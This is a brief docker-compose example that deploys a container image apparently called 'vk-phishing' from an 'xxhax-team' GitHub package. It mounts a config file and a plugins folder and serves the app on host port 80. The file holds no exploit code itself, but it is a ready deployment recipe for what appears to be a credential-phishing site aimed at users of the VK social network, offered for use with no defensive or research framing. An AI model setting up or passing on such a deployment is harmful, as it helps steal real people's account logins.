# This is example of usage docker compose with this image

version: "3.1"

services:
  phishing:
    image: docker.pkg.github.com/xxhax-team/vk-phishing/vk-phishing:latest
    volumes:
      - ./config.yml:/app/config.yml
      - ./plugins:/app/plugins
    ports: # 80 on host, 3000 in container
      - 80:3000
